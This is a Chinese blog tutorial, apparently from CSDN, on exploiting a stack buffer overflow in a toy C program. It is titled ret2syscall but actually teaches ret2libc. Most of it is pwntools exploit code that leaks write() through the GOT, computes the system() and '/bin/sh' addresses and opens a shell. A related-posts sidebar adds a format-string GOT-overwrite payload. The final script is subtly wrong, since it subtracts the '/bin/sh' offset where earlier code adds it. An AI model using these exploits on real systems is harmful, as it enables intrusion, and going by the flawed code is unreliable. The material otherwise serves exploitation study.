字符串溢出(pwn溢出)--ret2syscall

已于 2024-07-10 19:02:44 修改
阅读量761 收藏 1
点赞数
分类专栏: 二进制安全 文章标签: 安全
于 2022-09-29 18:37:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014247926/article/details/127109748
版权

背景知识
1、rop:在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。

2、gadgets:在程序中的指令片段,有时我们为了达到我们执行命令的目的,需要多个gadget来完成我们的功能。gadget最后一般都有ret,因为我们需要将程序控制权(EIP)给下一个gadget。即让程序自动持续的选择堆栈中的指令依次执行。

3、ropgadgets:一个pwntools的一个命令行工具,用来具体寻找gadgets的。例如:我们从pop、ret序列当中寻找其中的eax

 

本例中依然使用如下源码:

#include <stdio.h>
#include <unistd.h>
void readbuf()
{
    char buffer[100];
    read(0, buffer, 200);
}
int main(int argc, char *argv[])
{
    readbuf();
    write(1, "Hello, PWN!\n", 12);
    return 0;
}

但是这里只开启NX保护,打开ASLR

1a38b94cdd28495a95ced83a4bb73341.png

利用Ldd可以看到libc加载的地址是每次都有变化,没有直接找到system地址 

eb58b014c2b54bc79755ca3756fffbec.png 

 

 那么如何解决地址随机化的问题呢?思路是:我们需要先泄漏出libc.so某些函数在内存中的地址,然后再利用泄漏出的函数地址根据偏移量计算出system()函数和/bin/sh字符串在内存中的地址,然后再执行我们的ret2libc的shellcode。既然栈,libc,heap的地址都是随机的。我们怎么才能泄露出libc.so的地址呢?方法还是有的,因为程序本身在内存中的地址并不是随机的

我们可以在溢出时调用函数找到libc的基地址,通过基地址就可以找到system和"/bin/sh"的虚拟地址,并且返回地址继续返回到readbuf函数中,然后再溢出到system地址中。

在本例中我们需要通过write函数打印出system的地址,然后传递给带有溢出漏洞的read函数供我们向上一节例子中讲的一样使用。这里面涉及到PLT表和GOT表的概念。PLT为内部函数表既偏移地址,GOT为外部函数表。PLT作为中间表连接call命令与GOT表,GOT表存储的是函数的真实地址

如何利用某函数.plt地址与.got.plt地址获得函数的真实地址,通常exp里会出现二次提交,这里举一个小栗子,可以算是一个常用的获取某函数真实地址的代码模板


#假设我们利用的是write函数,puts函数也可以
#假设漏洞函数是readbuf函数
 
payload = 'a'*112 + p32(plt_write) +  p32(readbuf_addr) + p32(1) + p32(got_write) + p32(4)
 
#'a'*112:用来填充的padding
#p32(plt_write):write函数的plt地址覆盖返回地址
#p32(read_addr):plt_write结束后的返回地址,上面的这部分exp只是得到了write函数的真实地址,
#                得到后若不返回read函数使程序继续保持运行状态,程序就退出了
#p32(1) + p32(gotplt_write) + p32(4):
#这三个值其实就是我们平常使用write函数时传入的三个参数write(1,got_write,4),第一个参数是1理解,为啥第三个参数是4呢,那是因为got_write这个长度是4,所以这里就当做固定用法就好

 

原理说完了,如下方式可以获取加载lib的地址,类似如上的ldd test2看到的值

from pwn import *
test2 = ELF('test2')
proc = process('./test2')

leak_payload = "A"*112 + p32(test2.symbols['write'])+p32(test2.symbols['readbuf'])+p32(1)+p32(test2.got['write'])+p32(4)


proc.send(leak_payload)
write_va = u32(proc.recv(4))转换为#uncode估计是为了方便减法
print "write va:" + hex(write_va)
libc_load_base = write_va - libc.symbols['write']# 基地址相当于write虚拟地址-偏移地址
print "libc_load_base:" + hex(libc_load_base)#还是打印16进制

找到libc的基地址,我们就可以找system和bin/sh的地址,函数地址可以通过symbols函数找到,bin/sh只能进行搜索

libc = ELF('libc.so.6')
system = libc_load_base + libc.symbols['system']
# 虚拟地址 = 基地址+偏移地址
print "system va: " + hex(system)
binsh = libc_load_base + next(libc.search('/bin/sh'))
print '/bin/sh:' + hex(binsh)

最后构造payload:

shell_payload = "A"*112 + p32(system) + p32(1) + p32(binsh)
proc.send(shell_payload)
proc.interactive()
#这里加个p32(1)是随意填充32位的字节换成“A”*4这种亦可

最后是完整的exp代码如下,这里面我不理解的就是pwn库获得的基地址和查找binsh字符串的时候与执行elf的时候的地址如何做到还能一样,也许pwn本身是一种调试机制,不过最终代码是可以执行使用了。

from pwn import *

test = ELF('test2')
libc = ELF('/lib32/libc.so.6')
proc = process('./test2')

leak_payload = b"A"*112 + p32(test.symbols['write'])+p32(test.symbols['readbuf'])+p32(1)+p32(test.got['write'])+p32(4)
proc.send(leak_payload)

write_va = u32(proc.recv(4))#获取十进制地址

print("write va:" + hex(write_va))

libc_load_base = write_va - libc.symbols['write']

print("libc_load_base:" + hex(libc_load_base))

system = libc_load_base + libc.symbols['system']

print("system va: " + hex(system))

binsh = libc_load_base - next(libc.search(b'/bin/sh'))

print('/bin/sh:' + hex(binsh))

shell_payload = "A"*112 + p32(system) + p32(1) + p32(binsh)#p32(1)任意填充4个字节

proc.send(shell_payload)

proc.interactive()

 执行后结果如下,可以看到elf程序和so文件的sec权限情况

7cf70f0ab9844e3cba5d45c1fd0afbbe.png

 

 

莫慌搞安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3351
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8137
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
PWN入门学习之简单的栈溢出
2301_80718478的博客
06-28 554
溢出PWN的一种最简单的漏洞,其最核心的点就是,程序在读取用户输入的时候没有对输入内容进行检测与限制,从而导致输入的数据写入内存时挤占了其它不属于该变量的内存位置,从而导致重要寄存器(如RBP、RIP)中记录的地址被破坏,导致函数执行完返回时发生错误(找不到这样一个地址),即发生段错误(Segment fault)。但是同时,我们可以利用改写RBP、RIP寄存器值的这一特性,将程序跳转至我们期望的地方去。
pwn刷题num48----syscall + ret2csu
tbsqigongzi的博客
05-04 893
BUUCTF-PWN-ciscn_2019_s_3 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 (这里为了省事,自己写了一个小shell脚本) 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 这里sys_read和sys_write读取的字符串大小都大于buf的大小,存在栈溢出 syscall 系统
pwn基础之ctfwiki-栈溢出-基础ROP-ret2syscall
qq_52658640的博客
04-22 1414
文章目录前言原理系统调用ret2system挖掘漏洞2.读入数据总结 前言 二进制小白的学习笔记,如有错误请大佬及时斧正。 原理 ret2syscall,即控制程序执行系统调用,获取 shell。 系统调用 Linux 的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。操作系统实现系统调用的基本过程是: 应用程序调用库函数(API); API 将系统调用号存入 EAX,然后通过中断调用使系统进入内核态; 内核中的中断处理函数根据系统调用号,调用对应的内核函数(系统调用); 系统调用完成相应
pwn刷题num2---ret2syscall
tbsqigongzi的博客
04-21 478
攻防世界pwn新手区—level2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 开启部分RELRO---got表仍可写 未开启canary保护---存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 用ida查看一下 找到主函数 进入子函数vulnerable_function() 又是一个栈溢出(buf分配0x88字节大小空间,read函数读入0x100字节,可覆盖返回地址) 查看一下buf所在栈
CTFWIKI-PWN-ret2syscall
m0_64180167的博客
04-19 560
该题目是在32位下。
linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad
m0_67266787的博客
03-15 1164
文章目录 What is ret2syscall pwn题思路 例题 保护机制 写payload 打开flag 读取flag 写到输出中 生成shellcode 开始做题 调用read(0,mem,0x1000)把我们真正的shellcode写道mem 调试是否可以往mem写shellcode 往mem填写读取flag的shellcode 总结 What is ret2syscall ret2syscall是栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到s
PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 1537
虽然网上(包括CSDN)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1613
pwn练习1-ret2syscall(ROP-gadget)
pwn07.ret2syscall例题
11-11
ret2syscall例题
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 356
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1300
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
如何安全的申请SSL证书
2401_86337938的博客
07-22 1541
DV级别的证书只验证域名所有权,OV级别证书除了验证域名所有权外还会验证单位组织信息,EV级别的证书除了验证域名所有权、单位组织信息外还会验证详细组织业务信息。一旦你的证书被批准,你会收到一个包含证书文件的邮件。最后,在选择SSL证书时,也要注意选择受信任的可信根CA颁布的SSL证书,可以先向JoySSL官网工作人员发送自己需要保护的域名,提交自己所需要的证书类型,注册时填写。首先选择在授权的JoySSL提供商或者是受信任的证书颁发机构选择适合的证书类型。详细的公司信息验证,用于银行、电商等敏感行业。
字符串拼接实现pwn
12-03
字符串拼接在pwn中是非常常见的,可以用于构造payload,实现漏洞利用。下面是一个简单的例子,演示了如何使用字符串拼接实现pwn: 假设有一个程序存在格式化字符串漏洞,我们需要构造一个payload来执行system("/bin/sh")。首先,我们需要获取system函数的地址,可以使用pwntools中的DynELF模块来实现: ```python from pwn import * p = process("./vuln") # 启动程序 elf = ELF("./vuln") # 加载程序 # 获取system函数的地址 system_addr = elf.sym["system"] ``` 接下来,我们需要构造payload。由于格式化字符串漏洞是通过将格式化字符串作为参数传递给函数来触发的,因此我们需要构造一个包含system函数地址的格式化字符串。具体来说,我们可以使用"%n$"来引用参数列表中的第n个参数,从而实现读取任意地址的数据。例如,"%12$n"表示将当前已经输出的字符数写入参数列表中的第12个参数所指向的地址中。 ```python # 构造payload payload = p32(elf.got["printf"]) # 将printf的GOT地址作为第一个参数 payload += "%{}x%12$hn".format(system_addr & 0xffff) # 将system地址的低16位写入printf的GOT地址 payload += "%{}x%13$hn".format((system_addr >> 16) & 0xffff - (system_addr & 0xffff)) # 将system地址的高16位写入printf的GOT地址+2 ``` 最后,我们只需要将payload发送给程序即可: ```python # 发送payload p.sendline(payload) p.interactive() # 进入交互模式,可以手动输入命令 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

莫慌搞安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值